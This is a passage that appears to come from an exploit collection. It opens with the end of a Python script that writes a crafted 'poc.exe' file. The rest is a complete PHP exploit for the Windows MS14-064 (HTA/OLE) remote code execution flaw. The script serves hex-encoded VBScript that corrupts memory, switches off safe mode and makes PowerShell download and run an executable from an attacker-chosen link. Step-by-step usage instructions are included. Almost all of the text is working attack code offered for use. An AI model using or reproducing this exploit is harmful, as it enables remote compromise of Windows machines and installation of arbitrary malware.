"\x00\x10\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x40\x00\x00\x40\x6C\xDA\x5B\x4A\x10\x00\x00\x00" open("poc.exe", "wb").write(buffer)
  20. #!/usr/bin/php <?php # Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # MS14-064 # # # 1 . run php code : php hta.php # 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip) # 3 . open poc.hta # 4 . Your Link Download/Execute on your target # 5 . Finished ;) # # Demo : http://youtu.be/Vkswz7vt23M # $port=80; # Port Address $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link print " Mohammad Reza Espargham\n\n\n"; $host= gethostname(); #g3th0stn4m3 $ip = gethostbyname($host); #g3th0stbyn4m3 print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip . '"></head></html>'."\n\n"; $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,$port); socket_listen($reza); $msgd = "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76". "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65". "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68". "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20". "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63". "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75". "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20". "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62". "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22". "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65". "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65". "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61". "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c". "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d". "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53". "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b". "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70". "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e". "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61". "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73". "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55". "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61". "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78". "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20". "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a". "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28". "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a". "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a". "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65". "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20". "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69". "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e". "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20". "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a". "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61". "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68". "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30". "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72". "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68". "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28". "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f". "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75". "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69". "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e". "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29". "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d". "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69". "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f". "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33". "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e". "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66". "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20". "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72". "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76". "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43". "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20". "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74". "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74". "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e". "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69". "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32". "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a". "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30". "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d". "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61". "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34". "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61". "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75". "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20". "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e". "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20". "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28". "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20". "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20". "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b". "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28". "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68". "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20". "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37". "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75". "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d". "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20". "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20". "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33". "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30". "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20". "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30". "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20". "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65". "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34". "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38". "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28". "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29". "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69". "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61". "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28". "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29". "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66". "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20". "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d". "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20". "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69". "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20". "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46". "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28". "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20". "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49". "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72". "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a". "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65". "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45". "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20". "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65". "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29". "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20". "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36". "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64". "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d". "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e"; $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for (;;) { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>
